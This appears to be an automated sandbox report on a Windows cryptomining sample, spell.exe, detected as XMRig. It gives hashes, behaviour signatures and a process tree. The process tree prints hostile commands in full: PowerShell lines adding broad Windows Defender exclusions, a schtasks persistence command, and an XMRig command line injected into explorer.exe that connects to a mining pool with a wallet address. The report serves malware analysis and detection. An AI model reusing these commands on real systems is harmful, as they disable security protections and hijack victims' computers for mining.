Analysis
-
max time kernel
2698s -
max time network
2694s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
29/06/2024, 01:59
Static task
static1
Behavioral task
behavioral1
Sample
spell.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
spell.exe
Resource
win7-20240419-en
Behavioral task
behavioral3
Sample
spell.exe
Resource
win10-20240404-en
Behavioral task
behavioral4
Sample
spell.exe
Resource
win10v2004-20240508-en
General
-
Target
spell.exe
-
Size
2.1MB
-
MD5
ac109c80097d1d932ab66fc11e19b61f
-
SHA1
2d8eb980764fae4a728431e32321609a45f6741d
-
SHA256
dd5a76a2520d25db4010b9c27e6e6b3033995b72b18954f095215e08137850f6
-
SHA512
bb893cc7cb0eee04048390d92515dcf3e689eea15e67d8b461b26720d8ab2d127afc55cb006ab2088454346fb506f0a2e09004740b736da3f3bfacc5461f1b58
-
SSDEEP
49152:Get5GEw9XDPGmUI/LVuSO5q2OCvBc6laoCBpsFC6:HRw9XDuZI/YDlOCZc6la3sY6
Malware Config
Signatures
-
XMRig Miner payload 11 IoCs
resource yara_rule behavioral5/memory/4332-62-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral5/memory/4332-64-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral5/memory/4332-69-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral5/memory/4332-70-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral5/memory/4332-68-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral5/memory/4332-67-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral5/memory/4332-66-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral5/memory/4332-82-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral5/memory/4332-84-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral5/memory/4332-85-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral5/memory/4332-86-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2836 powershell.exe 2104 powershell.exe 3724 powershell.exe 4324 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 328 services64.exe 700 sihost64.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\system32\Microsoft\Libs\sihost64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\WR64.sys conhost.exe File created C:\Windows\system32\services64.exe conhost.exe File opened for modification C:\Windows\system32\services64.exe conhost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5084 set thread context of 4332 5084 conhost.exe 96 -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2868 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4948 conhost.exe 2836 powershell.exe 2836 powershell.exe 2104 powershell.exe 2104 powershell.exe 5084 conhost.exe 5084 conhost.exe 3724 powershell.exe 3724 powershell.exe 4324 powershell.exe 4324 powershell.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe 4332 explorer.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 4948 conhost.exe Token: SeDebugPrivilege 2836 powershell.exe Token: SeDebugPrivilege 2104 powershell.exe Token: SeDebugPrivilege 5084 conhost.exe Token: SeDebugPrivilege 3724 powershell.exe Token: SeLockMemoryPrivilege 4332 explorer.exe Token: SeLockMemoryPrivilege 4332 explorer.exe Token: SeDebugPrivilege 4324 powershell.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 468 wrote to memory of 4948 468 spell.exe 78 PID 468 wrote to memory of 4948 468 spell.exe 78 PID 468 wrote to memory of 4948 468 spell.exe 78 PID 4948 wrote to memory of 4984 4948 conhost.exe 79 PID 4948 wrote to memory of 4984 4948 conhost.exe 79 PID 4984 wrote to memory of 2836 4984 cmd.exe 81 PID 4984 wrote to memory of 2836 4984 cmd.exe 81 PID 4948 wrote to memory of 4364 4948 conhost.exe 83 PID 4948 wrote to memory of 4364 4948 conhost.exe 83 PID 4364 wrote to memory of 2868 4364 cmd.exe 85 PID 4364 wrote to memory of 2868 4364 cmd.exe 85 PID 4984 wrote to memory of 2104 4984 cmd.exe 86 PID 4984 wrote to memory of 2104 4984 cmd.exe 86 PID 4948 wrote to memory of 4416 4948 conhost.exe 87 PID 4948 wrote to memory of 4416 4948 conhost.exe 87 PID 4416 wrote to memory of 328 4416 cmd.exe 89 PID 4416 wrote to memory of 328 4416 cmd.exe 89 PID 328 wrote to memory of 5084 328 services64.exe 90 PID 328 wrote to memory of 5084 328 services64.exe 90 PID 328 wrote to memory of 5084 328 services64.exe 90 PID 5084 wrote to memory of 2300 5084 conhost.exe 91 PID 5084 wrote to memory of 2300 5084 conhost.exe 91 PID 2300 wrote to memory of 3724 2300 cmd.exe 93 PID 2300 wrote to memory of 3724 2300 cmd.exe 93 PID 5084 wrote to memory of 700 5084 conhost.exe 94 PID 5084 wrote to memory of 700 5084 conhost.exe 94 PID 700 wrote to memory of 1596 700 sihost64.exe 95 PID 700 wrote to memory of 1596 700 sihost64.exe 95 PID 700 wrote to memory of 1596 700 sihost64.exe 95 PID 5084 wrote to memory of 4332 5084 conhost.exe 96 PID 5084 wrote to memory of 4332 5084 conhost.exe 96 PID 5084 wrote to memory of 4332 5084 conhost.exe 96 PID 5084 wrote to memory of 4332 5084 conhost.exe 96 PID 5084 wrote to memory of 4332 5084 conhost.exe 96 PID 5084 wrote to memory of 4332 5084 conhost.exe 96 PID 5084 wrote to memory of 4332 5084 conhost.exe 96 PID 5084 wrote to memory of 4332 5084 conhost.exe 96 PID 5084 wrote to memory of 4332 5084 conhost.exe 96 PID 5084 wrote to memory of 4332 5084 conhost.exe 96 PID 5084 wrote to memory of 4332 5084 conhost.exe 96 PID 5084 wrote to memory of 4332 5084 conhost.exe 96 PID 5084 wrote to memory of 4332 5084 conhost.exe 96 PID 5084 wrote to memory of 4332 5084 conhost.exe 96 PID 5084 wrote to memory of 4332 5084 conhost.exe 96 PID 2300 wrote to memory of 4324 2300 cmd.exe 97 PID 2300 wrote to memory of 4324 2300 cmd.exe 97 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\spell.exe"C:\Users\Admin\AppData\Local\Temp\spell.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\spell.exe"2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:2868
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:328 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"5⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit6⤵
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4324
-
-
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:700 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"7⤵PID:1596
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=45fPKuDFXtpFRPKFCiNDZVjNuTSAMd8XwS2ouV1hWy7s5y6rn1fjfbXL8sJNAZSMS4EXhvbKisPeuEb24XchsUSeBXdQxrL --pass=SPELL --cpu-max-threads-hint=90 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --tls --cinit-stealth6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4332
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
539B
MD52d0c598bdafdf3bca91ec28b81c4474b
SHA12e7c2a21ceb95b3a774461e15f1f0a9ede36a3d5
SHA25674f5fd99f66fcffa14a0927a9767c956120e90e714abea702b51a919c60d3ab0
SHA51253fc7d64040f563601f7b5e63b1c1bbc7a98a4b1591bb18456bd3edb774c47859b0b56325ffc93128cdac547419ab11cfa1685f301b20ecb283f7414d4aed8a5
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
944B
MD51a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA19910190edfaccece1dfcc1d92e357772f5dae8f7
SHA2560ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA5125d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
-
Filesize
944B
MD54f4f3e62877d5a49c78f52446c6e0b70
SHA11820bd563b11b05e7efdc5890eb281d4d72f7acf
SHA2568cb81e14624137f8064e76ad0068f0a51cbea21e41a6e68a384490541b21839b
SHA5125823ff6218b03536b7719bd37a197b9bf300a52940f5faf3f03bd012b86e9fda5d4ffef0b3e9152eb309e0decff8e0fc8247622bc0a995b9211aeaee6bf1e5ba
-
Filesize
944B
MD569416944dac24129d0969e2ac46f0533
SHA1d71969659956b32411e0606a9bee640a0b108ef4
SHA256dffc7e01106427982d7cafd3d7e3be37e16b098fbb0958410ea8d7c68bfb97ca
SHA512aabb330053579af0d9de2661bd70eaadfd2e2e617759bc9c380db1c64731c6711304e49882138e9d337815377ee012a7458f91f692cb31538d73624385867f4c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
32KB
MD5069a6f7a77eaf05c4145ec872579f07e
SHA102bdf233197e979bb99343c7473c20492972187b
SHA25659c8dc7bbbe8ea1a8ecd01e8a780f8af39309717fb0f6e44c583579e91674860
SHA5122c1d29f817417e0298137bb3e3b7fc94af6dab084a7a7575fe11431c7d2766e89f4074e99583b327025beaf3e53e08b8a1844e1e9ef93f1e9e2b2a4d66e39306
-
Filesize
2.1MB
MD5ac109c80097d1d932ab66fc11e19b61f
SHA12d8eb980764fae4a728431e32321609a45f6741d
SHA256dd5a76a2520d25db4010b9c27e6e6b3033995b72b18954f095215e08137850f6
SHA512bb893cc7cb0eee04048390d92515dcf3e689eea15e67d8b461b26720d8ab2d127afc55cb006ab2088454346fb506f0a2e09004740b736da3f3bfacc5461f1b58